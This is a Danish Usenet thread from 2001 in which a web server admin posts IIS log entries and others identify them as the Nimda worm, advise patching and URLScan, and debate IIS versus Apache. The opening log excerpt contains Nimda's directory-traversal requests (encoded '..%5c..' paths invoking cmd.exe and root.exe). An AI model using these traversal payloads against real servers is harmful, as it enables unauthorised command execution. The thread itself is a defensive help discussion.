---

Hejsa

Dette står i en af logfilerne på min webserver, er det en
person/program/virus der sidder og leger eller?.
Finder det lidt irriterende og håber at der er nogle her der kan hjælpe.
Helst per e-mail

På forhånd tak.
Anders Goltermann


2001-11-19 20:50:11 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/root.exe /c+dir 404 2 3396 72 10 HTTP/1.0 www - - -
2001-11-19 20:50:13 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/MSADC/root.exe /c+dir 404 2 3396 70 0 HTTP/1.0 www - - -
2001-11-19 20:50:15 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
2001-11-19 20:50:18 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 10 HTTP/1.0 www - - -
2001-11-19 20:50:20 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 HTTP/1.0
www - - -
2001-11-19 20:50:22 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396
117 0 HTTP/1.0 www - - -
2001-11-19 20:50:24 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396
117 0 HTTP/1.0 www - - -
2001-11-19 20:50:25 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 500 87 0 145 0 HTTP/1.0 www - - -
2001-11-19 20:50:26 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 123 0 97 0 HTTP/1.0
www - - -
2001-11-19 20:50:28 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2001-11-19 20:50:30 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2001-11-19 20:50:32 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2001-11-19 20:50:32 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 98 0 HTTP/1.0
www - - -
2001-11-19 20:50:34 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 HTTP/1.0
www - - -
2001-11-19 20:50:34 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 100 0 HTTP/1.0
www - - -
2001-11-19 20:50:35 62.243.29.151 - W3SVC1 x xx.xxx.xx.xx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 HTTP/1.0
www - - -

---

-=Zuzezimzulze=- wrote:

> Hejsa
>
> Dette står i en af logfilerne på min webserver, er det en
> person/program/virus der sidder og leger eller?.


En nimda orm (eller en variant) har ramt 62.243.29.151, som er en ADSL
bruger hos TDC. Denne orm prøver at sprede sig videre til dig og andre i
nærheden af din IP.

> Finder det lidt irriterende og håber at der er nogle her der kan hjælpe.
> Helst per e-mail

Sørg for at patche din webserver.

---

-=Zuzezimzulze=- wrote:

>Dette står i en af logfilerne på min webserver, er det en
>person/program/virus der sidder og leger eller?.

Det er ormen Nimda eller hvad den nu hedder. Bare ignorer det. Medmindre
du kører en upatched IIS-server.

>Finder det lidt irriterende og håber at der er nogle her der kan hjælpe.
>Helst per e-mail

Nej. Du spørger i en nyhedsgruppe og får svar i en nyhedsgruppe. På den
måde kan andre også lære lidt.

--
"...personality goes a long way."

http://chran.dyndns.dk - Nu med misbrug!

---

Christian Andersen wrote:
>
> -=Zuzezimzulze=- wrote:
>
> >Dette står i en af logfilerne på min webserver, er det en
> >person/program/virus der sidder og leger eller?.
>
> Det er ormen Nimda eller hvad den nu hedder. Bare ignorer det. Medmindre
> du kører en upatched IIS-server.

Hvis man bruger IIS bør man overveje at skifte til en anden webserver.
Apache er et alternativ, mig bekendt er det meget længe siden, der
sidst er set sikkerhedshuller i Apache.

--
Kasper Dupont

---

Kasper Dupont wrote:

> Hvis man bruger IIS bør man overveje at skifte til en anden webserver.
> Apache er et alternativ, mig bekendt er det meget længe siden, der
> sidst er set sikkerhedshuller i Apache.


Endvidere er den portet vil "lidt" flere platformer end IIS.

Inden folk nu begynder at påstå at Apache er fyldt med huller, så kik
lige om disser huller mon ikke ligger i moduler man kan linke ind i
apache og ikke i selve apache.

Ønsker man en hånddreven webserver kan følgende anbefaldes:

http://www.uclinux.com/hand-powered_web_server/index.html

*grin*

---

Kasper Dupont wrote:

> Hvis man bruger IIS bør man overveje at skifte til en anden webserver.
> Apache er et alternativ, mig bekendt er det meget længe siden, der
> sidst er set sikkerhedshuller i Apache.


Endvidere er den portet til "lidt" flere platformer end IIS.

Inden folk nu begynder at påstå at Apache er fyldt med huller, så kik
lige om disse huller mon ikke ligger i moduler man kan linke ind i
apache og ikke i selve apache.

Ønsker man en hånddreven webserver kan følgende anbefaldes:

http://www.uclinux.com/hand-powered_web_server/index.html

*grin*

---

Thus spake Christian E. Lysel in news:3BFA2366.90903@wmdata.com:

> Inden folk nu begynder at påstå at Apache er fyldt med huller, så kik
> lige om disse huller mon ikke ligger i moduler man kan linke ind i
> apache og ikke i selve apache.

Det samme kan man faktisk sige om IIS. Den store forskel kommer i at det er
Microsoft der har lavet modulerne, og de har valgt at aktivere dem alle fra
starten af.

Jeg synes dog jeg kan ane at de vil holde op med dette meget snart. Det vil
så betyde at du får en IIS uden .printer, .hta og hvad den ellers kan af
dimser deaktiveret, medmindre du overlagt går ind og aktiverer dem.

--
Karsten H.
Som har skrevet delen før @ baglæns for at narre fjenden i Aalborg.

---

"Karsten H." skrev

> Jeg synes dog jeg kan ane at de vil holde op med dette meget snart.
> Det vil så betyde at du får en IIS uden .printer, .hta og hvad den
> ellers kan af dimser deaktiveret, medmindre du overlagt går ind og
> aktiverer dem.

Snart og snart. Næster server-generation er planlagt til at blive leve-
ret i starten af 2. kvartal næste år, med de sædvanlige forsinkelser
bliver det nok snarere i starten af 4. kvartal.

Ok, indrømmet, jeg er pessimistisk på grund af tidligere erfaringer
med MS og releasedatoer. Dem jeg kender, som har leget med .net server
er dog ret overbevist om at produktet er meget tæt på at være klar til
levering.

Jeg ser frem til at modtage en leg^h^h^htestpizzaboks og se hvad der
sker når .net bliver smidt på den. Der er vist længere leveringstid
hos min normale pusher, men jeg skulle kunne nå at få den førend det
bliver til en julegave.

Apropos webservere og opsætning af samme, vi har en konsulent rendende
som installerer noget intranet vi skal til at teste. Han vil gudhjælpe-
mig have installeret seneste IE og mediaplayer på serveren. Idiot.

Han havde glemt sin bærbare og mente at have behov for at teste det
opsatte, som straf har han fået tildelt en gammel P75 med W95, 32 MB
ram og alle programmer i Citrix.

Med venlig hilsen

Peder

---

Thus spake Peder Vendelbo Mikkelsen in news:9tel7p.r0.3
@mjoelner.aaks.aarhus.dk:

> Apropos webservere og opsætning af samme, vi har en konsulent rendende
> som installerer noget intranet vi skal til at teste. Han vil gudhjælpe-
> mig have installeret seneste IE og mediaplayer på serveren. Idiot.

Du brokker dig nu. Bare vent til han kommer og siger at hele office 2000
skal ligge på serveren.

--
Karsten H.
Som har skrevet delen før @ baglæns for at narre fjenden i Aalborg.

---

"Karsten H." skrev

> Du brokker dig nu. Bare vent til han kommer og siger at hele office
> 2000 skal ligge på serveren.

Hvor fanden ved du det fra?

Det er faktisk ikke engang løgn, han vil have MS-Office på webserverne,
på grund af at der er mulighed (i intranetproduktet) for at uploade MS-
Office dokumenter som derefter konverteres til noget webvisbart format
ved hjælp af filtrene som medfølger.

Jeg må nok indrømme, at jeg rendte rundt, råbte og skreg den næste hal-
ve time.

Hvis folk vil bruge MS-Office, kan de fandme lære at gemme i det for-
mat de skal bruge, derefter kan de uploade og demoroniser.pl[1] kan
rydde op i den skoddede kode. Hmm, demoroniser er ikke opdateret siden
'98, så det er nok bedre at bruge HTML Tidy[2] og gøre det på en sepa-
rat maskine.

Med venlig hilsen

Peder

[1] http://fourmilab.ch/webtools/demoroniser/
[2] http://www.w3.org/People/Raggett/tidy.

---

"Peder Vendelbo Mikkelsen" <pedervm@gmx.net> wrote in message
news:9tel7p.r0.3@mjoelner.aaks.aarhus.dk

> Apropos webservere og opsætning af samme, vi har en konsulent rendende
> som installerer noget intranet vi skal til at teste. Han vil gudhjælpe-
> mig have installeret seneste IE og mediaplayer på serveren. Idiot.

Typisk har en del merge modules/msi pakker bla IE5.01 som dependt eller
nuyere så det er
måske ikke helt idioti

---

"Flemming Riis" skrev

> Typisk har en del merge modules/msi pakker bla IE5.01 som dependt
> eller nuyere så det er måske ikke helt idioti

Tjah, bum bum, man kunne vel nøjes med de enkelt pakker/ med de enkel-
te dll-filer og så lave en regsvr32 navnpådll.dll.

I dette tilfælde skulle der bruges MS-XML 3.0, det tog mig mindre end
30 sekunder at finde den på msdn.microsoft.com/xml, i en nyere udgave
(med SP1).

Leverandøren er helt fremme i skoen med nye MS tiltag [1] og bør vel
forventes at abbonnere på MSDN.

Med venlig hilsen

Peder

[1] Der bliver benytte en del MS-browser specifik kode, bl.a. en bunke
iforms. Iforms er gode til at teste om windows kan bruge al ledig hu-
kommelse på en maskine, hvis man benytter IE førend V. 6.

---

Karsten H. wrote:

> Det samme kan man faktisk sige om IIS. Den store forskel kommer i at det er
> Microsoft der har lavet modulerne, og de har valgt at aktivere dem alle fra
> starten af.


Forskellen er blot, at det ikke er nemt at slå "modulerne" fra.
Grænsefladen antyder endvidere ikke at det er modul-opbygget.


> Jeg synes dog jeg kan ane at de vil holde op med dette meget snart. Det vil
> så betyde at du får en IIS uden .printer, .hta og hvad den ellers kan af
> dimser deaktiveret, medmindre du overlagt går ind og aktiverer dem.

Gad vide hvordan man aktivere .hta?

Jeg er lidt træt af MS, de påstår de har en sikkerhedgruppe til at
auditere og rette fejl, men hvor mange sikkerhedsfejl har MS selv fundet?

Endvidere fraskriver MS sig enhver risko der måtte være i at patche en
given MS server. Det er da lidt selvmodsigende.

---

"Christian E. Lysel" <chlys@wmdata.com> wrote in message
news:3BFAD58F.7090404@wmdata.com

> Jeg er lidt træt af MS, de påstår de har en sikkerhedgruppe til at
> auditere og rette fejl, men hvor mange sikkerhedsfejl har MS selv fundet?

Med deres disclousre politik fortæller de det nok ikke til nogen.

> Endvidere fraskriver MS sig enhver risko der måtte være i at patche en
> given MS server. Det er da lidt selvmodsigende.

Hvis mig en producent der garanter sikkerhed i produkter til den pris klasse
?

---

"-=Zuzezimzulze=-" skrev

> Finder det lidt irriterende og håber at der er nogle her der kan
> hjælpe.

Hvis du ikke gider se på det i dine logfiler, kan du ved hjælp af
ISAPI-filteret Urlscan få linierne smidt i en anden seperat logfil:

<URL: http://microsoft.com./technet/security/URLScan.asp >

Det er ret vigtigt, at du læser al dokumentation på siden og som med-
følger, for du kan potentielt lukke dit websted hvis du opsætter ISAPI
filteret forkert.

> Helst per e-mail

Ok, hvor skal jeg sende fakturaen hen?

Hvis du skal have særbehandling, skal du betale.

I øvrigt, din OE er opsat forkert for du medsender ikke informationer
om hvilket tegnsæt du brugte til at skrive dit indlæg og det er lidt
uheldigt når du bruger tegn udenfor US-ASCII (ANSIX-3.4). Læs her
hvordan du kan rette fejlen:

<URL: http://kommunalbastards.org/oe/tegnsaet.html >

Der er en fejl på siden, du skal ikke bruge 8-bit i headere.

Med venlig hilsen

Peder